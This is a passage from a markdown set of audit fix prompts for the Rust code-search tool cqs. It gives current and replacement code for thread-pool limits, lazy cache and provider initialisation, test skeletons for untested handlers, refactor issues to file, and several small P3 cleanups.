+    *self.provider.get_or_init(crate::embedder::provider::select_provider)
+}
+
+// Session::create_session and other call sites use self.provider() instead
+// of self.provider.
+```
+
+Update `Embedder::new` to pass the resolved-or-deferred provider to the struct. Remove the eager `select_provider()` call.
+
+### Notes
+
+Verifier needs to read `Embedder::new` and `Session::create_session` signatures to thread this through. The audit's bigger-picture recommendation (move probe inside `Session::create_session`) is the right end state. Pragmatic minimum: keep the `OnceLock` outside session, lazy on first access.
+
+---
+
+### P2.76 — serve handlers spawn_blocking unbounded
+
+**File:** `src/serve/handlers.rs:86-89` + 5 sites + `src/serve/mod.rs:92-95`
+
+#### Current code
+
+`src/serve/mod.rs:92-95`:
+
+```rust
+    let runtime = tokio::runtime::Builder::new_multi_thread()
+        .enable_all()
+        .build()
+```
+
+Default `max_blocking_threads=512`.
+
+#### Replacement
+
+```rust
+    let runtime = tokio::runtime::Builder::new_multi_thread()
+        .worker_threads(num_cpus::get().min(4))
+        .max_blocking_threads(8)
+        .enable_all()
+        .build()
+```
+
+### Notes
+
+8 concurrent SQL queries is plenty for an interactive single-user UI. Combined with worker_threads cap, daemon's max steady-state thread count is bounded at 12 (vs. 512+num_cpus today). Optionally wrap each handler's `spawn_blocking` in `tokio::time::timeout(30s, ...)` — separate change, mark follow-on.
+
+If `num_cpus` not in deps, use `std::thread::available_parallelism()` directly.
+
+---
+
+### P2.77 — Embedder clear_session doubled-memory window
+
+**File:** `src/embedder/mod.rs:261, 808-823`
+
+#### Current code
+
+`src/embedder/mod.rs:808-823`:
+
+```rust
+    pub fn clear_session(&self) {
+        let mut guard = self.session.lock().unwrap_or_else(|p| p.into_inner());
+        *guard = None;
+        let mut cache = self.query_cache.lock().unwrap_or_else(|p| p.into_inner());
+        cache.clear();
+        let mut tok = self.tokenizer.lock().unwrap_or_else(|p| p.into_inner());
+        *tok = None;
+        tracing::info!("Embedder session, query cache, and tokenizer cleared");
+    }
+```
+
+#### Replacement
+
+Surface the doubled-memory window via tracing, since the deeper fix (RwLock around tokenizer to wait for in-flight inference) extends the inference critical section.
+
+```rust
+    pub fn clear_session(&self) {
+        let mut guard = self.session.lock().unwrap_or_else(|p| p.into_inner());
+        *guard = None;
+        let mut cache = self.query_cache.lock().unwrap_or_else(|p| p.into_inner());
+        cache.clear();
+        let mut tok = self.tokenizer.lock().unwrap_or_else(|p| p.into_inner());
+        // RM-V1.30: surface the doubled-memory window when in-flight
+        // inference holds an Arc clone of the tokenizer concurrent with
+        // the next-use lazy reload. Strong count > 1 means another thread
+        // is mid-encode; the inner Option clears here, but the cloned Arc
+        // keeps the old tokenizer alive until that thread releases it,
+        // so peak memory transiently exceeds documented ~500MB by the
+        // tokenizer size (~10-20MB).
+        if let Some(t) = tok.as_ref() {
+            let strong = std::sync::Arc::strong_count(t);
+            if strong > 1 {
+                tracing::info!(
+                    strong_count = strong,
+                    stage = "clear_during_inference",
+                    "tokenizer Arc still referenced by in-flight inference; \
+                     transient doubled-memory window during reload"
+                );
+            }
+        }
+        *tok = None;
+        tracing::info!("Embedder session, query cache, and tokenizer cleared");
+    }
+```
+
+### Notes
+
+Audit calls option (a) — RwLock around tokenizer with clear taking write lock — as higher-risk because it extends the inference critical section. Option (b) here just surfaces the cost so operators can correlate memory spikes. Mark option (a) as follow-on issue.
+
+---
+
+### P2.92 — Embedder::new opens fresh QueryCache + 7-day prune on every CLI command
+
+**File:** `src/embedder/mod.rs:355-366`
+
+#### Current code
+
+`src/embedder/mod.rs:353-366`:
+
+```rust
+        // Best-effort disk cache for query embeddings. Opens a small SQLite
+        // DB at ~/.cache/cqs/query_cache.db. Failure is non-fatal.
+        let disk_query_cache =
+            match crate::cache::QueryCache::open(&crate::cache::QueryCache::default_path()) {
+                Ok(c) => {
+                    let _ = c.prune_older_than(7);
+                    Some(c)
+                }
+                Err(e) => {
+                    tracing::debug!(error = %e, "Disk query cache unavailable (non-fatal)");
+                    None
+                }
+            };
+```
+
+#### Replacement
+
+Lazy-open. Replace `Option<QueryCache>` with `OnceLock<Option<QueryCache>>` and open on first `embed_query`.
+
+```rust
+// Struct field change:
+// disk_query_cache: Option<crate::cache::QueryCache>,
+// →
+disk_query_cache: std::sync::OnceLock<Option<crate::cache::QueryCache>>,
+
+// In Embedder::new — drop the eager open block. Initialize the OnceLock
+// empty:
+disk_query_cache: std::sync::OnceLock::new(),
+
+// New accessor:
+fn disk_query_cache(&self) -> Option<&crate::cache::QueryCache> {
+    self.disk_query_cache
+        .get_or_init(|| {
+            match crate::cache::QueryCache::open(
+                &crate::cache::QueryCache::default_path(),
+            ) {
+                Ok(c) => {
+                    let _ = c.prune_older_than(7);
+                    Some(c)
+                }
+                Err(e) => {
+                    tracing::debug!(
+                        error = %e,
+                        "Disk query cache unavailable (non-fatal)"
+                    );
+                    None
+                }
+            }
+        })
+        .as_ref()
+}
+```
+
+Update every site that uses `self.disk_query_cache` to call `self.disk_query_cache()`.
+
+### Notes
+
+The audit calls out 16 call sites that construct an embedder via `try_model_config` for commands that never call `embed_query` — `notes list`, `slot list`, `cache stats`. Lazy-open eliminates the WSL DrvFS 30-50ms cold-open per CLI invocation.
+
+---
+
+## P2.78–P2.87 — Test Coverage (happy-path) cluster
+
+**Finding:** P2.78–P2.87 in audit-triage.md
+**Why:** Every v1.30.0 surface (#1113 HNSW rebuild, #1114 registry, #1118 auth, #1120 provider, serve data, batch dispatch handlers, LLM passes) shipped without tests. Bundle into a coherent test-debt PR series.
+
+Group structure: each test cluster gets one prompt with a test skeleton. Tests use `InProcessFixture` style seeding.
+
+---
+
+### P2.78 — TC-HAP: serve data endpoints (build_graph, build_chunk_detail, build_hierarchy, build_cluster) untested with populated data
+
+**Files:** `src/serve/data.rs:192,452,586,825,933`, `src/serve/tests.rs:25` (`fixture_state` is empty-only).
+
+#### Test skeleton
+
+Add `src/serve/tests/data_populated.rs` (or extend `tests.rs`):
+
+```rust
+// Seed: process_data → validate → format_output, plus one test chunk.
+// Assert build_graph returns 3 nodes + 2 call edges; max_nodes=1 truncates;
+// kind_filter excludes tests.
+
+#[test]
+fn build_graph_returns_seeded_nodes_and_edges() {
+    let fx = InProcessFixture::seed_minimal_call_graph();
+    let result = build_graph(&fx.store, None, None, None).unwrap();
+    assert_eq!(result.nodes.len(), 3);
+    assert_eq!(result.edges.len(), 2);
+}
+
+#[test]
+fn build_graph_max_nodes_truncates() {
+    let fx = InProcessFixture::seed_minimal_call_graph();
+    let result = build_graph(&fx.store, None, None, Some(1)).unwrap();
+    assert_eq!(result.nodes.len(), 1);
+}
+
+#[test]
+fn build_chunk_detail_returns_callers_callees_tests() {
+    let fx = InProcessFixture::seed_minimal_call_graph();
+    let detail = build_chunk_detail(&fx.store, "process_data_chunk_id").unwrap().unwrap();
+    assert_eq!(detail.callers.len(), 0);
+    assert_eq!(detail.callees.len(), 2);
+    assert_eq!(detail.tests.len(), 1);
+}
+
+#[test]
+fn build_hierarchy_callees_returns_subtree() {
+    let fx = InProcessFixture::seed_minimal_call_graph();
+    let h = build_hierarchy(&fx.store, "process_data", Direction::Callees, 5).unwrap();
+    assert_eq!(h.nodes.len(), 3);
+}
+
+#[test]
+fn build_cluster_returns_nodes_when_umap_populated() {
+    let fx = InProcessFixture::seed_with_umap_coords();
+    let result = build_cluster(&fx.store, None).unwrap();
+    assert!(!result.nodes.is_empty());
+}
+```
+
+### Notes
+
+`InProcessFixture::seed_minimal_call_graph` doesn't exist yet — needs a small helper that inserts 3 chunks + 2 function_calls rows. Pattern lives in `tests/related_impact_test.rs` or similar; verifier should grep for an existing seeding helper before rolling a new one.
+
+---
+
+### P2.79 — TC-HAP: 16 batch dispatch handlers have zero tests
+
+**Files:** `src/cli/batch/handlers/misc.rs:15,131,173,209` + `graph.rs:24,63,103,143,233,292,375,392` + `info.rs:46,100,168,302`
+
+#### Test skeleton
+
+Add `tests/batch_handlers_test.rs`:
+
+```rust
+fn seeded_ctx() -> (BatchContext, Sink) { /* InProcessFixture + tiny corpus */ }
+
+#[test] fn dispatch_callers_round_trips() {
+    let (mut ctx, mut sink) = seeded_ctx();
+    ctx.dispatch_line("callers process_data", &mut sink).unwrap();
+    let env: Value = serde_json::from_slice(&sink.bytes).unwrap();
+    assert!(env["data"]["callers"].is_array());
+}
+
+// Repeat for: dispatch_callees, dispatch_impact, dispatch_test_map,
+// dispatch_trace, dispatch_similar, dispatch_explain, dispatch_context,
+// dispatch_deps, dispatch_related, dispatch_impact_diff, dispatch_gather,
+// dispatch_scout, dispatch_task, dispatch_where, dispatch_onboard.
+```
+
+### Notes
+
+Each test is ~10 lines. Bundle as one file. Use `dispatch_search` test pattern at `src/cli/batch/handlers/search.rs:528-742` as template. Each handler test asserts only envelope shape + a non-empty results array, not algorithmic correctness.
+
+---
+
+### P2.80 — TC-HAP: Reranker rerank/rerank_with_passages no tests
+
+**Files:** `src/reranker.rs:160, 190`
+
+#### Test skeleton
+
+```rust
+#[test]
+#[ignore] // requires reranker model on disk
+fn rerank_preserves_input_set_reorders_by_score() {
+    let r = Reranker::new(&Config::default()).unwrap();
+    let q = "rust async await";
+    let passages = ["tokio runtime docs", "how to bake sourdough", "rust futures trait"];
+    let scored: Vec<SearchResult> = passages.iter().enumerate().map(|(i, p)| /*...*/).collect();
+    let out = r.rerank(q, scored).unwrap();
+    assert_eq!(out.len(), 3, "all 3 passages preserved");
+    let last = out.last().unwrap();
+    assert!(last.content.contains("sourdough"), "baking ranks last");
+}
+
+#[test]
+fn rerank_with_passages_empty_input_returns_empty() {
+    let r = Reranker::new(&Config::default()).unwrap();
+    let out = r.rerank_with_passages("q", vec![], vec![]).unwrap();
+    assert!(out.is_empty());
+}
+```
+
+### Notes
+
+The empty-input test does NOT need the model — it should hit a no-op shortcut. Verify the no-op path exists at the top of `rerank_with_passages`; if not, add it. The model-loading test stays `#[ignore]`-gated.
+
+---
+
+### P2.81 — TC-HAP: cmd_project Search has no CLI integration test
+
+**Files:** `src/cli/commands/infra/project.rs:70` (`cmd_project Search` arm)
+
+#### Test skeleton
+
+Add `tests/cli_project_search_test.rs`:
+
+```rust
+#[test]
+fn project_search_returns_results_from_each_registered_project() {
+    let proj_a = TempProject::with_content(&[("a/foo.rs", "fn process_data() {}")]);
+    let proj_b = TempProject::with_content(&[("b/bar.rs", "fn validate() {}")]);
+    cqs!(["project", "register", "a", proj_a.root().to_str().unwrap()]);
+    cqs!(["project", "register", "b", proj_b.root().to_str().unwrap()]);
+    cqs!(["index"], cwd = proj_a.root());
+    cqs!(["index"], cwd = proj_b.root());
+    let out = cqs!(["project", "search", "process", "--json"]);
+    let env: Value = serde_json::from_slice(&out.stdout).unwrap();
+    let results = env["data"]["results"].as_array().unwrap();
+    let projects: HashSet<&str> = results.iter().map(|r| r["project"].as_str().unwrap()).collect();
+    assert!(projects.contains("a"));
+    // (project b might or might not match depending on query; relax to "at least one").
+    assert!(!results.is_empty());
+}
+```
+
+### Notes
+
+`tests/cross_project_test.rs` likely has the cross-project fixture; reuse if present. The `cqs!` macro is whatever the project's existing CLI invocation harness uses — grep for usage in `tests/cli_*.rs`.
+
+---
+
+### P2.82 — TC-HAP: cqs ref add/list/remove/update no end-to-end CLI test
+
+**Files:** `src/cli/commands/infra/reference.rs:88, 187, 320, 350`
+
+#### Test skeleton
+
+Add `tests/cli_ref_test.rs`:
+
+```rust
+#[test]
+fn ref_add_then_list_shows_reference_with_chunk_count() {
+    let proj = TempProject::with_content(&[("src/x.rs", "fn foo() {}")]);
+    let refp = TempProject::with_content(&[("ref/y.rs", "fn bar() {}"), ("ref/z.rs", "fn baz() {}")]);
+    cqs!(["init"], cwd = proj.root());
+    cqs!(["index"], cwd = proj.root());
+    cqs!(["ref", "add", "lib", refp.root().to_str().unwrap()], cwd = proj.root());
+    let out = cqs!(["ref", "list", "--json"], cwd = proj.root());
+    let env: Value = serde_json::from_slice(&out.stdout).unwrap();
+    let refs = env["data"]["refs"].as_array().unwrap();
+    assert_eq!(refs.len(), 1);
+    assert_eq!(refs[0]["name"], "lib");
+    assert!(refs[0]["chunks"].as_u64().unwrap() >= 2);
+}
+
+#[test]
+fn ref_remove_deletes_from_config_and_disk() { /* ... */ }
+#[test]
+fn ref_update_reindexes_source_content() { /* ... */ }
+#[test]
+fn ref_add_weight_rejects_out_of_range() { /* ... */ }
+```
+
+### Notes
+
+The `cqs!` invocation pattern + JSON parse is shared across `tests/cli_*.rs`. `weight` must be in `0.0..=1.0` per existing `validate_ref_name` logic.
+
+---
+
+### P2.83 — TC-HAP: handle_socket_client no happy-path round-trip test
+
+**Files:** `src/cli/watch.rs:160`
+
+#### Test skeleton
+
+Add `tests/daemon_socket_roundtrip_test.rs`:
+
+```rust
+#[tokio::test(flavor = "multi_thread")]
+async fn handle_socket_client_round_trips_stats() {
+    use tokio::io::{AsyncReadExt, AsyncWriteExt};
+    use tokio::net::UnixStream;
+    let (mut client, server) = UnixStream::pair().unwrap();
+    let server_std = server.into_std().unwrap();
+    server_std.set_nonblocking(false).unwrap();
+
+    let store = InProcessFixture::seed_minimal();
+    let ctx = BatchContext::new(store);
+
+    // Spawn the server-side handler against the std stream.
+    let handle = std::thread::spawn(move || {
+        handle_socket_client(server_std, &ctx);
+    });
+
+    let request = br#"{"command":"stats","args":[]}\n"#;
+    client.write_all(request).await.unwrap();
+    let mut buf = Vec::new();
+    let _ = tokio::time::timeout(
+        std::time::Duration::from_secs(5),
+        client.read_to_end(&mut buf),
+    ).await;
+
+    let env: Value = serde_json::from_slice(&buf).unwrap();
+    assert!(env["data"]["total_chunks"].is_number());
+    assert!(env["error"].is_null());
+    handle.join().unwrap();
+}
+```
+
+### Notes
+
+`handle_socket_client` likely takes a `&Mutex<BatchContext>` per current signature — wrap appropriately. `stats` chosen because it needs no embedder. Adjust framing (newline vs length-prefix) by reading the actual `handle_socket_client` impl.
+
+---
+
+### P2.84 — TC-HAP: spawn_hnsw_rebuild/drain_pending_rebuild zero tests
+
+**Files:** `src/cli/watch.rs spawn_hnsw_rebuild` (~965), `drain_pending_rebuild`
+
+#### Test skeleton
+
+Add `src/cli/watch/tests.rs` (or `tests/watch_hnsw_rebuild_test.rs`):
+
+```rust
+#[test]
+fn rebuild_completes_and_swaps_owned_index() {
+    let fx = InProcessFixture::seed_n_chunks(50, dim = 16);
+    let pending = spawn_hnsw_rebuild(
+        fx.cqs_dir.clone(),
+        fx.index_db.clone(),
+        16,
+        "test",
+    );
+    let outcome = pending.rx.recv_timeout(Duration::from_secs(30)).unwrap().unwrap();
+    let idx = outcome.expect("rebuild produced an index");
+    assert_eq!(idx.len(), 50);
+}
+
+#[test]
+fn delta_replayed_on_swap() { /* seed 50, push 5 deltas mid-rebuild, assert post-swap len == 55 */ }
+
+#[test]
+fn delta_dedup_avoids_double_insert() { /* seed 50, push delta with existing id, assert len == 50 */ }
+```
+
+### Notes
+
+dim=16 keeps the test fast; `build_hnsw_index_owned` doesn't care about embedding semantics. Verifier needs to spec out the actual `swap` API call sequence — `drain_pending_rebuild` is the consumer in the watch loop.
+
+---
+
+### P2.85 — TC-HAP: for_each_command! macro + 4 emitters no behavioral tests
+
+**Files:** `src/cli/registry.rs:61`, `src/cli/definitions.rs:850,897`, `src/cli/dispatch.rs:51,83`
+
+#### Test skeleton
+
+Add `src/cli/registry.rs::tests`:
+
+```rust
+#[test]
+fn every_command_variant_has_batch_support_entry() {
+    use strum::IntoEnumIterator; // assumes Commands derives EnumIter
+    let allowed_none: HashSet<&str> = ["Help", "Version"].iter().copied().collect();
+    for v in Commands::iter() {
+        let bs = BatchSupport::for_command(&v);
+        if matches!(bs, BatchSupport::None) {
+            assert!(
+                allowed_none.contains(variant_name(&v)),
+                "Variant {:?} returns BatchSupport::None but is not on the allowed list",
+                variant_name(&v)
+            );
+        }
+    }
+}
+
+#[test]
+fn group_a_variants_disjoint_from_group_b() {
+    let a: HashSet<&str> = group_a_variant_names().into_iter().collect();
+    let b: HashSet<&str> = group_b_variant_names().into_iter().collect();
+    let inter: Vec<_> = a.intersection(&b).collect();
+    assert!(inter.is_empty(), "Variants in both groups: {:?}", inter);
+}
+```
+
+### Notes
+
+`Commands` may not derive `EnumIter` — if not, hand-roll a `for_each_command!`-driven const list helper. `group_a_variant_names()` / `group_b_variant_names()` need helper functions exposed by the registry. Verifier must wire those up.
+
+`compile_fail` test via `trybuild` was the audit's bonus — out of scope unless `trybuild` is already a dev-dep.
+
+---
+
+### P2.86 — TC-HAP: build_hnsw_index_owned/build_hnsw_base_index no direct tests
+
+**Files:** `src/cli/commands/index/build.rs:848, 880`
+
+#### Test skeleton
+
+Add `src/cli/commands/index/build.rs::tests`:
+
+```rust
+#[test]
+fn build_hnsw_index_owned_returns_index_with_chunk_count() {
+    let fx = InProcessFixture::seed_n_chunks(10, dim = 16);
+    let idx = build_hnsw_index_owned(&fx.store, &fx.cqs_dir).unwrap().unwrap();
+    assert_eq!(idx.len(), 10);
+}
+
+#[test]
+fn build_hnsw_base_index_returns_none_when_no_base_rows() {
+    let fx = InProcessFixture::empty();
+    let result = build_hnsw_base_index(&fx.store, &fx.cqs_dir).unwrap();
+    assert!(result.is_none());
+}
+
+#[test]
+fn build_hnsw_index_owned_round_trips_through_disk() {
+    let fx = InProcessFixture::seed_n_chunks(10, dim = 16);
+    let idx = build_hnsw_index_owned(&fx.store, &fx.cqs_dir).unwrap().unwrap();
+    // Reload from disk:
+    let loaded = HnswIndex::load_with_dim(&fx.cqs_dir, "index", 16).unwrap();
+    assert_eq!(loaded.len(), idx.len());
+    let an_id = idx.ids().iter().next().cloned().unwrap();
+    assert!(loaded.ids().contains(&an_id));
+}
+```
+
+### Notes
+
+`HnswIndex::load_with_dim` API confirm in `src/hnsw/`. dim=16 keeps test fast.
+
+---
+
+### P2.87 — TC-HAP: hyde_query_pass and doc_comment_pass have zero tests
+
+**Files:** `src/llm/hyde.rs:11`, `src/llm/doc_comments.rs:135`
+
+#### Test skeleton
+
+Extend `tests/local_provider_integration.rs`:
+
+```rust
+#[test]
+fn hyde_query_pass_round_trips_through_mock_server() {
+    let fx = InProcessFixture::seed_n_chunks(3, /* with text content */);
+    let mock = MockLlmServer::with_canned("hyde response").start();
+    std::env::set_var("CQS_LLM_PROVIDER", "local");
+    std::env::set_var("CQS_LLM_API_BASE", mock.url());
+    let count = hyde_query_pass(&fx.store, /* args */).unwrap();
+    assert_eq!(count, 3);
+    let rows = fx.store.get_summaries_by_purpose("hyde").unwrap();
+    assert_eq!(rows.len(), 3);
+}
+
+#[test]
+fn doc_comment_pass_skips_already_documented_functions() {
+    let fx = InProcessFixture::seed_with_doc_status(&[
+        ("foo", false), ("bar", false), ("baz_documented", true),
+    ]);
+    let mock = MockLlmServer::with_canned("doc response").start();
+    std::env::set_var("CQS_LLM_PROVIDER", "local");
+    std::env::set_var("CQS_LLM_API_BASE", mock.url());
+    let count = doc_comment_pass(&fx.store, /* args */).unwrap();
+    assert_eq!(count, 2);
+}
+```
+
+### Notes
+
+`MockLlmServer` should already exist for the existing `llm_summary_pass` tests in `tests/local_provider_integration.rs:113-280`. Reuse the harness.
+
+---
+
+## P2.88 — Adding third score signal touches two parallel fusion paths
+
+**Finding:** P2.88 in audit-triage.md
+**Files:** `src/store/search.rs:182-229`, `src/search/query.rs:511-720`
+**Why:** RRF locked to two lists (`semantic_ids`, `fts_ids`); SPLADE fuses on a separate α-blend path. Type boost is a third post-fusion multiplier.
+
+### Notes
+
+This is an extensibility / refactor finding, not a single-line bug. Producing a "minimal change" prompt would understate the scope. Mark as a tracking issue:
+
+- Generalize `Store::rrf_fuse` to `rrf_fuse_n(ranked_lists: &[&[&str]], limit: usize) -> Vec<(String, f32)>`.
+- Introduce `trait ScoreSignal { fn rank(&self, query: &Query) -> Vec<&str>; fn weight(&self) -> f32; }` and a `FusionPipeline` that owns an ordered list of signals.
+- Migrate semantic + FTS + SPLADE + name-fingerprint + type-boost to uniform participants.
+
+Out of scope for inline fix. **Recommendation:** file as GitHub issue, mark P2.88 as "issue" disposition.
+
+---
+
+## P2.89 — Vector index backend selection is hand-coded if/else
+
+**Finding:** P2.89 in audit-triage.md
+**Files:** `src/cli/store.rs:423-540`
+**Why:** 120-line `#[cfg(feature = "cuda-index")]` block; new backend = new env var, new branch, new persisted-path literal, new gate. `VectorIndex` trait clean but selector isn't trait-driven.
+
+### Notes
+
+Same shape as P2.88 — extensibility refactor, not a single-line bug. The audit recommends extending `VectorIndex` with `try_open` + `priority` so the selector iterates a `&[&dyn IndexBackend]` slice. Out of scope for inline fix. **Recommendation:** file as issue, mark P2.89 as "issue" disposition.
+
+---
+
+## P2.90 — ScoringOverrides knob → 4 sites; no shared resolver
+
+**Finding:** P2.90 in audit-triage.md
+**Files:** `src/config.rs:153-172` + scoring sites
+**Why:** Each scoring knob requires editing struct, defaults, env-var resolver, consumer.
+
+### Notes
+
+Same shape — extensibility refactor. Audit recommends `HashMap<&'static str, f32>` + `static SCORING_KNOBS: &[ScoringKnob]` table. Out of scope for inline fix. **Recommendation:** file as issue, mark P2.90 as "issue" disposition.
+
+---
+
+## P2.91 — NoteEntry has no kind/tag taxonomy
+
+**Finding:** P2.91 in audit-triage.md
+**Files:** `src/note.rs:41-89`
+**Why:** Sentiment-only; no kind field; "TODO" / "design-decision" / "known-bug" must be encoded in note text as unsearchable string patterns.
+
+### Notes
+
+Schema migration + struct change + TOML round-trip + CLI flag — multi-file refactor. **Recommendation:** file as issue, mark P2.91 as "issue" disposition. Inline fix would understate scope.
+
+---
+# P3 + P4 fix prompts — v1.30.0 audit
+
+Inputs: `docs/audit-triage.md` + `docs/audit-findings.md`. P3 are minimal Edit-style fix prompts. P4 are paste-ready GitHub issue bodies.
+
+---
+
+## P3.1 — Hoist `panic_message` helper into one place
+
+**Finding:** P3.1
+**Files:** `src/cli/pipeline/mod.rs:223-232`, `src/store/mod.rs:1322-1326`, `src/cache.rs:743-747`, `src/cache.rs:1735-1739`
+**Why:** Four copies of identical panic-payload extraction logic across 3 modules. Make it `pub(crate)` and use it everywhere.
+
+### Current code
+```rust
+// src/cli/pipeline/mod.rs:223-232 — pub(crate)? actually `fn` (private)
+fn panic_message(payload: &Box<dyn std::any::Any + Send>) -> String {
+    if let Some(s) = payload.downcast_ref::<&str>() {
+        (*s).to_string()
+    } else if let Some(s) = payload.downcast_ref::<String>() {
+        s.clone()
+    } else {
+        "unknown panic".to_string()
+    }
+}
+```
+Plus 3 inline copies inside `Drop` impls (`Store::drop`, `EmbeddingCache::drop`, `QueryCache::drop`) — each a 4-arm `match payload.downcast_ref::<&str>()` ladder.
+
+### Replacement
+1. Promote `panic_message` to `pub(crate) fn` in `src/lib.rs` (next to `temp_suffix`) keeping the same signature `&Box<dyn Any + Send> -> String`.
+2. Delete the private function in `src/cli/pipeline/mod.rs`; replace the 3 inline copies in the Drop impls with `crate::panic_message(payload)`.
+
+---
+
+## P3.2 — Extract one `find_reference_config` helper for resolve.rs
+
+**Finding:** P3.2
+**Files:** `src/cli/commands/resolve.rs:26-39, 46-57`
+**Why:** `find_reference` and `resolve_reference_db` re-roll the same `iter().find(|r| r.name == name)` + verbatim error message. Single source of truth.
+
+### Current code
+```rust
+// resolve.rs:26-39  find_reference
+let cfg = config.references.iter()
+    .find(|r| r.name == name)
+    .ok_or_else(|| anyhow::anyhow!(
+        "Reference '{}' not found. Run 'cqs ref list' to see available references.", name
+    ))?;
+// ...load_references for full ReferenceIndex
+
+// resolve.rs:46-57  resolve_reference_db (inline duplicate)
+let cfg = config.references.iter()
+    .find(|r| r.name == name)
+    .ok_or_else(|| anyhow::anyhow!(
+        "Reference '{}' not found. Run 'cqs ref list' to see available references.", name
+    ))?;
+// uses cfg.path
+```
+
+### Replacement
+Add a private helper at the top of `resolve.rs`:
+```rust
+fn find_reference_config<'a>(
+    config: &'a Config,
+    name: &str,
+) -> anyhow::Result<&'a ReferenceConfig> {
+    config.references.iter()
+        .find(|r| r.name == name)
+        .ok_or_else(|| anyhow::anyhow!(
+            "Reference '{}' not found. Run 'cqs ref list' to see available references.", name
+        ))
+}
+```
+Call it from both sites.
+
+---
+
+## P3.3 + P3.19 — `slot::libc_exdev` hardcode (combined)
+
+**Finding:** P3.3 (cosmetic) + P3.19 (Windows wrong constant)
+**Files:** `src/slot/mod.rs:628-647`
+**Why:** The `libc_exdev() -> 18` shim is justified by an outdated comment (libc is already a workspace dep), AND it mis-identifies the cross-device error on Windows (`ERROR_NOT_SAME_DEVICE = 17`). Drop the magic number entirely and fall back to copy+remove on any rename failure.
+
+### Current code
+```rust
+// src/slot/mod.rs:628-647
+pub(crate) fn move_file(src: &Path, dst: &Path) -> std::io::Result<()> {
+    match fs::rename(src, dst) {
+        Ok(()) => Ok(()),
+        Err(e) if e.raw_os_error() == Some(libc_exdev()) => {
+            fs::copy(src, dst)?;
+            fs::remove_file(src)?;
+            Ok(())
+        }
+        Err(e) => Err(e),
+    }
+}
+
+/// EXDEV `errno` value (cross-device link). We hardcode 18 (Linux) since
+/// `libc::EXDEV` would pull in a libc dep just for this constant. macOS also
+/// uses 18; Windows doesn't surface EXDEV the same way (rename across
+/// filesystems just succeeds via the win32 API).
+#[inline]
+fn libc_exdev() -> i32 { 18 }
+```
+
+### Replacement
+```rust
+pub(crate) fn move_file(src: &Path, dst: &Path) -> std::io::Result<()> {
+    match fs::rename(src, dst) {
+        Ok(()) => Ok(()),
+        // Fall back to copy+remove on ANY rename failure (cross-device,
+        // ERROR_NOT_SAME_DEVICE on Windows, EXDEV on Unix). Cheaper than
+        // tracking platform-specific errno constants — if the source is
+        // gone after the copy, callers see the I/O error from copy() instead.
+        Err(_) => {
+            fs::copy(src, dst)?;
+            fs::remove_file(src)?;
+            Ok(())
+        }
+    }
+}
+```
+Delete `fn libc_exdev()` entirely.
+
+---
+
+## P3.4 — Doc: `enumerate_files` honors .cqsignore too
+
+**Finding:** P3.4
+**Files:** `src/lib.rs:542-547`
+**Why:** Public-API doc comment claims gitignore-only; body adds `.cqsignore` when `no_ignore=false`.
+
+### Current code
+```rust
+/// Enumerate files to index in a project directory.
+///
+/// Respects .gitignore, skips hidden files and files larger than
+/// `CQS_MAX_FILE_SIZE` bytes (default 1MB — generated code can exceed this).
+/// Returns relative paths from the project root.
+///
+/// Shared file enumeration for consistent indexing.
+pub fn enumerate_files(
+```
+
+### Replacement
+```rust
+/// Enumerate files to index in a project directory.
+///
+/// Respects `.gitignore` and `.cqsignore` (additive on top of `.gitignore`,
+/// both disabled by `no_ignore=true`); skips hidden files and files larger
+/// than `CQS_MAX_FILE_SIZE` bytes (default 1 MiB — generated code can
+/// exceed this). Returns relative paths from the project root.
+pub fn enumerate_files(
+```
+
+---
+
+## P3.5 — Drop dead `generate_nl_with_call_context` from public API
+
+**Finding:** P3.5
+**Files:** `src/lib.rs:165` (`pub use nl::*`); `src/nl/mod.rs:43-59`
+**Why:** Five-arg wrapper that hardcodes `summary=None, hyde=None`. Zero production callers, only test references; leaks via glob re-export.
+
+### Current code
+```rust
+// src/nl/mod.rs:43-59
+pub fn generate_nl_with_call_context(
+    chunk: &Chunk, callers: &[String], callees: &[String],
+    note: Option<&str>, template: NlTemplate,
+) -> String {
+    generate_nl_with_call_context_and_summary(
+        chunk, callers, callees, note, /*summary=*/ None,
+        /*hyde=*/ None, template,
+    )
+}
+```
+
+### Replacement
+Delete the wrapper. Update tests in `src/nl/mod.rs` that call it to call `generate_nl_with_call_context_and_summary(.., None, None, ..)` directly. Optionally tighten the glob: replace `pub use nl::*` in `src/lib.rs:165` with an explicit `pub use nl::{NlTemplate, generate_nl_description, generate_nl_with_template, generate_nl_with_call_context_and_summary};`.
+
+---
+
+## P3.6 — Rename `GatherArgs::expand` to `--depth`
+
+**Finding:** P3.6
+**Files:** `src/cli/args.rs:GatherArgs::expand`
+**Why:** Top-level `--expand-parent` (bool) and `cqs gather --expand <N>` (usize) collide; v1.30.0 only half-fixed the rename. Align `gather` with `onboard`/`impact`/`test-map` which already use `--depth`.
+
+### Current code
+```rust
+// in GatherArgs (src/cli/args.rs)
+#[arg(long, default_value = "2")]
+pub expand: usize,
+```
+
+### Replacement
+```rust
+/// Call-graph BFS depth for gather expansion (matches onboard/impact/test-map).
+#[arg(long, default_value = "2", visible_alias = "expand")]
+pub depth: usize,
+```
+Sweep references to `args.expand` in `src/cli/commands/search/gather.rs` to `args.depth`.
+
+---
+
+## P3.7 — `cqs eval --save` requires `.json`
+
+**Finding:** P3.7
+**Files:** `src/cli/commands/eval/mod.rs` (`EvalCmdArgs::save`); call site that opens the file
+**Why:** Accepts any path; eval reports are JSON-only. Asymmetric with `--baseline` which already requires the file exist.
+
+### Current code
+```rust
+// EvalCmdArgs::save: Option<PathBuf>  — no validation
+// In the runner: File::create(&save_path)?
+```
+
+### Replacement
+At the runner's open site (or top of `cmd_eval`):
+```rust
+let save_path = args.save.as_deref().map(|p| {
+    let ext = p.extension().and_then(|e| e.to_str());
+    match ext {
+        Some("json") => Ok(p.to_path_buf()),
+        Some(other) => anyhow::bail!(
+            "--save must end in .json (got .{other}); eval reports are JSON-only"
+        ),
+        None => {
+            let with_ext = p.with_extension("json");
+            tracing::info!(path = %with_ext.display(), "appending .json to --save path");
+            Ok(with_ext)
+        }
+    }
+}).transpose()?;
+```
+
+---
+
+## P3.8 — Eval runner: `eprintln!` → `tracing::info!`
+
+**Finding:** P3.8
+**Files:** `src/cli/commands/eval/runner.rs:163-168`
+**Why:** Every other progress signal uses `tracing::info!`; `eprintln!` defeats `RUST_LOG` filtering and JSON log redirect.
+
+### Current code
+```rust
+// runner.rs:167 (approx)
+eprintln!("[eval] {done}/{total} queries ({qps:.1} q/s)");
+```
+
+### Replacement
+```rust
+tracing::info!(done, total = total_queries, qps, "eval progress");
+```
+
+---
+
